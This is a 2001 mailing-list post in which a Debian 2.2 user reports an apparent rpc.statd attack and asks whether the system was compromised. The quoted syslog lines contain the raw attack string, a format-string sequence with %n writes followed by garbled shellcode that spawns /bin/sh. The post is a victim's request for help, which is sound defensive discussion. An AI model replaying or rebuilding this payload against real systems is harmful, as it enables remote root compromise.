I saw messages on this list from early in the year about an rpc.statd exploit, and I believe it just happened to me. I'd appreciate any help from you all. I'm on a new 2.2 install from CD-ROM; both nfs-common and nfs-kernel-server are version 0.1.9.1-1. Someone on this list said that this problem "is becoming a FAQ" as a "failed crack attempt"; what I'd like to know from you all is a) was this failed -- is there any way of knowing whether or not I've been cracked and b) what should I do next?
What happened was all logged-in terminals (and xterms) received the following: ------------------------------------- Message from [EMAIL PROTECTED] at Fri Jun 15 14:17:10 2001 ... gatsby ------------------------------------- I noticed that control-g stopped working (no bell) and the following showed up in /var/log/syslog (with a similar display in /var/log/messages): ------------------------------------- Jun 15 14:17:10 gatsby Jun 15 14:17:10 gatsby syslogd: Cannot glue message parts together Jun 15 14:17:10 gatsby 173>Jun 15 14:17:10 /sbin/rpc.statd[156]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n1Àë|YA^PA^HþÀA^DÃþÀ^A! °fͳ^BY^LÆA^NÆA^H^PI^DA^D^L^A°fͳ^D°fͳ^E0ÀA^D°fÍ Jun 15 14:17:10 gatsby Ç^F/binÇF^D/shA0ÀF^Gv^LV^PN^Ló°^KÍ°^AÍèÿÿÿ -------------------------------------
